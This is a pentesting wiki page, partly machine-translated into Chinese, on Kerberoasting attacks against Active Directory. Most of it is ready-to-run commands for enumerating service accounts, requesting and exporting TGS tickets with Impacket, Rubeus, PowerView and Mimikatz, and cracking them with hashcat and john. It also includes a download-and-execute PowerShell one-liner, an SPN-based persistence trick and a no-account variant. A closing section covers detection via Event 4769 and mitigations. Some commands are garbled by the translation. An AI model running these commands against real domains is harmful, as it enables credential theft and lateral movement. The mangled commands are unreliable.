Kerberoast

Reading time: 6 minutes

Kerberoast

Kerberoasting 关注于获取 TGS tickets,特别是与 Active Directory (AD) 中的 用户账户 相关的服务,排除 计算机账户。这些票证的加密使用源自 用户密码 的密钥,从而允许 离线凭证破解 的可能性。使用用户账户作为服务的标志是 "ServicePrincipalName" 属性非空。

要执行 Kerberoasting,需要一个能够请求 TGS tickets 的域账户;然而,这个过程并不需要 特殊权限,使得任何拥有 有效域凭证 的人都可以访问。

关键点:

  • Kerberoasting 针对 AD 中的 用户账户服务TGS tickets
  • 使用 用户密码 的密钥加密的票证可以 离线破解
  • 服务通过 ServicePrincipalName 的非空值来识别。
  • 不需要特殊权限,只需 有效域凭证

攻击

warning

Kerberoasting 工具 通常在执行攻击和发起 TGS-REQ 请求时请求 RC4 encryption。这是因为 RC4 是 较弱的,并且比其他加密算法如 AES-128 和 AES-256 更容易使用工具如 Hashcat 进行离线破解。
RC4 (类型 23) 哈希以 $krb5tgs$23$* 开头,而 AES-256 (类型 18) 以 $krb5tgs$18$* 开头。
此外,请小心,因为 Rubeus.exe kerberoast 会自动请求所有易受攻击账户的票证,这会导致被检测。首先,找到具有有趣权限的可 kerberoast 的用户,然后仅对他们运行。

bash

#### **Linux**

Metasploit framework

msf> use auxiliary/gather/get_user_spns

Impacket

GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/ -outputfile hashes.kerberoast # 密码将被提示 GetUserSPNs.py -request -dc-ip <DC_IP> -hashes : / -outputfile hashes.kerberoast

kerberoast: https://github.com/skelsec/kerberoast

kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL><USERNAME>:@<DC_IP>' -o kerberoastable # 1. 枚举可kerberoast的用户 kerberoast spnroast 'kerberos+password://<DOMAIN.FULL><USERNAME>:@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. 转储哈希


Multi-features tools including a dump of kerberoastable users:

ADenum: https://github.com/SecuProject/ADenum

adenum -d <DOMAIN.FULL> -ip <DC_IP> -u -p -c


#### Windows

- **Enumerate Kerberoastable users**

获取可Kerberoast的用户

setspn.exe -Q / #这是一个内置的二进制文件。关注用户账户 Get-NetUser -SPN | select serviceprincipalname #Powerview .\Rubeus.exe kerberoast /stats


- **Technique 1: Ask for TGS and dump it from memory**

从单个用户获取内存中的 TGS

Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #示例: MSSQLSvc/mgmt.domain.local

获取所有可进行 kerberoast 的账户的 TGS(包括 PC,不太聪明)

setspn.exe -T DOMAIN_NAME.LOCAL -Q / | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

列出内存中的 kerberos 票据

klist

从内存中提取它们

Invoke-Mimikatz -Command '"kerberos::list /export"' #将票据导出到当前文件夹

将 kirbi 票据转换为 john

python2.7 kirbi2john.py sqldev.kirbi

将 john 转换为 hashcat

sed 's/$krb5tgs$(.):(.)/$krb5tgs$23$*\1*$\2/' crack_file > sqldev_tgs_hashcat


- **Technique 2: Automatic tools**

Powerview: 获取用户的 Kerberoast 哈希

Request-SPNTicket -SPN "" -Format Hashcat #使用 PowerView 示例: MSSQLSvc/mgmt.domain.local

Powerview: 获取所有 Kerberoast 哈希

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation

Rubeus

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast .\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #特定用户 .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #获取管理员

Invoke-Kerberoast

iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast


<div class="mdbook-alerts mdbook-alerts-warning">
<p class="mdbook-alerts-title">
  <span class="mdbook-alerts-icon"></span>
  warning
</p>


When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.

</div>


### Cracking

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi


### Persistence

If you have **enough permissions** over a user you can **make it kerberoastable**:

Set-DomainObject -Identity -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose


You can find useful **tools** for **kerberoast** attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)

If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC. There are a few options:

- `ntpdate <IP of DC>` - Deprecated as of Ubuntu 16.04
- `rdate -n <IP of DC>`

### Mitigation

Kerberoasting can be conducted with a high degree of stealthiness if it is exploitable. In order to detect this activity, attention should be paid to **Security Event ID 4769**, which indicates that a Kerberos ticket has been requested. However, due to the high frequency of this event, specific filters must be applied to isolate suspicious activities:

- The service name should not be **krbtgt**, as this is a normal request.
- Service names ending with **$** should be excluded to avoid including machine accounts used for services.
- Requests from machines should be filtered out by excluding account names formatted as **machine@domain**.
- Only successful ticket requests should be considered, identified by a failure code of **'0x0'**.
- **Most importantly**, the ticket encryption type should be **0x17**, which is often used in Kerberoasting attacks.

获取事件 -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$.Message.split("n")[8] -ne 'krbtgt' -and $_.Message.split("n")[8] -ne '*$' -and $.Message.split("n")[3] -notlike '*$@*' -and $_.Message.split("n")[18] -like '0x0' -and $_.Message.split("`n")[17] -like "0x17"} | select ExpandProperty message


To mitigate the risk of Kerberoasting:

- Ensure that **Service Account Passwords are difficult to guess**, recommending a length of more than **25 characters**.
- Utilize **Managed Service Accounts**, which offer benefits like **automatic password changes** and **delegated Service Principal Name (SPN) Management**, enhancing security against such attacks.

By implementing these measures, organizations can significantly reduce the risk associated with Kerberoasting.

## Kerberoast w/o domain account

In **September 2022**, a new way to exploit a system was brought to light by a researcher named Charlie Clark, shared through his platform [exploit.ph](https://exploit.ph/). This method allows for the acquisition of **Service Tickets (ST)** via a **KRB_AS_REQ** request, which remarkably does not necessitate control over any Active Directory account. Essentially, if a principal is set up in such a way that it doesn't require pre-authentication—a scenario similar to what's known in the cybersecurity realm as an **AS-REP Roasting attack**—this characteristic can be leveraged to manipulate the request process. Specifically, by altering the **sname** attribute within the request's body, the system is deceived into issuing a **ST** rather than the standard encrypted Ticket Granting Ticket (TGT).

The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).

<div class="mdbook-alerts mdbook-alerts-warning">
<p class="mdbook-alerts-title">
  <span class="mdbook-alerts-icon"></span>
  warning
</p>


You must provide a list of users because we don't have a valid account to query the LDAP using this technique.

</div>


#### Linux

- [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413):

GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/


#### Windows

- [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139):

Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"